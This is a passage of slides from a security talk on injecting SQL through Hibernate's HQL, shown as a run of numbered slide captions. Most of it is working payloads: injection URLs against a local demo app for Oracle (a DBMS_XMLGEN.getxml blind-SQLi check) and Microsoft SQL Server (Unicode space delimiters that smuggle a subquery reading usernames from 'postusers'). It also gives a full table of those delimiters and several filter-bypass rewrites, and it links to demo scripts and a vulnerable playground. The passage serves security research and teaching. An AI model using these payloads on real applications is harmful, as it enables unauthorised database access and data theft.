  • 15. Oracle DBMS  DBMS_XMLGEN.getxml(‘SQL’) returns CLOB or null [ null if SQL returns no rows ]  It is possible to know if the SQL return 0 rows or > 0 using TO_CHAR and NVL built-ins NVL(TO_CHAR(DBMS_XMLGEN.getxml(‘SQL')),'1')!='1'
  • 16. Oracle DBMS  Navigate to URL http://127.0.0.1:8080/app/dummy%27%20and%20NVL(TO_CHAR(DBMS_XMLGEN.getxml(%27SELECT%201337% 20FROM%20dual%20where%201337>1%27)),%271%27)!=%271%27%20and%20%271%27=%271  HQL query SELECT p FROM pl.btbw.persistent.Post p where p.name='dummy' and NVL(TO_CHAR(DBMS_XMLGEN.getxml('SELECT 1337 FROM dual where 1337>1')),'1')!='1' and '1'='1‘  SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' and NVL(to_char(DBMS_XMLGEN.getxml('SELECT 1337 FROM dual where 1337>1')), '1')<>'1' and '1'='1'
  • 17. Microsoft SQL Server DBMS  Trick with ’’ not working • Quote escaping with ‘’ only [not with ’]  There are no usable functions like query_to_xml(‘SQL’)
  • 18. Microsoft SQL Server DBMS  Hibernate ORM allows Unicode symbols in identifiers!!! ANTLR grammar for HQL parsing is here https://github.com/hibernate/hibernate-orm/blob/1ed895a3737c211e8c895b0297f801daccfe85a9/hibernate-core/src/main/antlr/hql.g ANTLR (ANother Tool for Language Recognition) - http://www.antlr.org/
  • 19. Microsoft SQL Server DBMS  Hibernate ORM allows Unicode symbols in identifiers!!! IDENT options { testLiterals=true; } : ID_START_LETTER ( ID_LETTER )* { // Setting this flag allows the grammar to use keywords as identifiers, if necessary. setPossibleID(true); } ; protected ID_START_LETTER : '_' | '$' | 'a'..'z' | 'u0080'..'ufffe' // HHH-558 : Allow unicode chars in identifiers ; protected ID_LETTER : ID_START_LETTER | '0'..'9' ;
  • 20. Microsoft SQL Server DBMS  MS SQL Server allows Unicode delimiters in query!!! There are many delimiters like space [U+0020] LEN(U(selectU(1)) [ U – Unicode delimiter ]  We’ve found them all with dumb Fuzzing!!!
  • 21. Microsoft SQL Server DBMS  Here are the magic delimiters [U] U+00A0 %C2%A0 No-break space U+1680 %E1%9A%80 OGHAM SPACE MARK U+2000 %E2%80%80 EN QUAD U+2001 %E2%80%81 EM QUAD U+2002 %E2%80%82 EN SPACE U+2003 %E2%80%83 EM SPACE U+2004 %E2%80%84 THREE-PER-EM SPACE U+2005 %E2%80%85 FOUR-PER-EM SPACE U+2006 %E2%80%86 SIX-PER-EM SPACE U+2007 %E2%80%87 FIGURE SPACE U+2008 %E2%80%88 PUNCTUATION SPACE U+2009 %E2%80%89 Thin space
  • 22. Microsoft SQL Server DBMS  Here are the magic delimiters [U] U+200A %E2%80%8A HAIR SPACE U+200B %E2%80%8B ZERO WIDTH SPACE U+2028 %E2%80%A8 LINE SEPARATOR U+2029 %E2%80%A9 PARAGRAPH SEPARATOR U+202F %E2%80%AF NARROW NO-BREAK SPACE U+205F %E2%81%9F Medium Mathematical space U+3000 %E3%80%80 Ideographic space
  • 23. Microsoft SQL Server DBMS  Navigate to URL http://127.0.0.1:8080/app/dummy%27%20or%201%3CLEN%28%C2%A0%28select%C2%A0top%C2%A01%C2%A0una me%C2%A0from%C2%A0postusers%29%29%20or%20%2731%27=%27143999  HQL query SELECT p FROM pl.btbw.persistent.Post p where p.name='dummy' or 1<LEN([U+00A0]( select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999' Hibernate sees here two function calls: Len and [U+00A0] Identifier select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers is passed as function argument  Resulting SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len([U+00A0](select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999'
  • 24. Microsoft SQL Server DBMS select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len([U+00A0](select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999‘ Is the same as select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len(select top 1 uname from postusers)) or '31'='143999'
  • 25. Microsoft SQL Server DBMS: additional useful tricks Query fragment How to rewrite to full HQL Result where id=13 where id like 13 No “=“ where field=‘data’ where field like cast(0xDATA_IN_HEX as varchar) No “=“; No “ ’ “ where field not in (‘data1’, ‘data2’) where 0 like charindex(concat(‘+’,field,’+’), cast(0xDATA1DATA2_IN_HEX as varchar(MAX))) No list 0xDATA_IN_HEX smth_known_to_hibernate(..) U0xDATA_IN_HEX Usmth_known_to_hibernate(..) int || func  identifier substring((select…),N,1)=‘c’ N like charindex(‘c’, (select…), N) substring  charindex
  • 26. Hey, dude stop it! Show me the hack! Video - https://www.youtube.com/watch?v=m_MTWZptXUw All demo scripts are here - https://github.com/0ang3el/Hibernate-Injection-Study Vulnerable App - https://github.com/0ang3el/HQLi-playground
  • 27. Takeaways ▶ HQL injection is SQL injection [ exploit HQLi as bSQLi ] ▶ Hibernate is not a WAF ▶ Our exploitation technique works because: ▶ Hibernate allows arbitrary names for identifiers (function and argument names) ▶ Hibernate allows Unicode symbols in identifiers ▶ Hibernate escapes quotes [‘] in string by doubling them [‘’]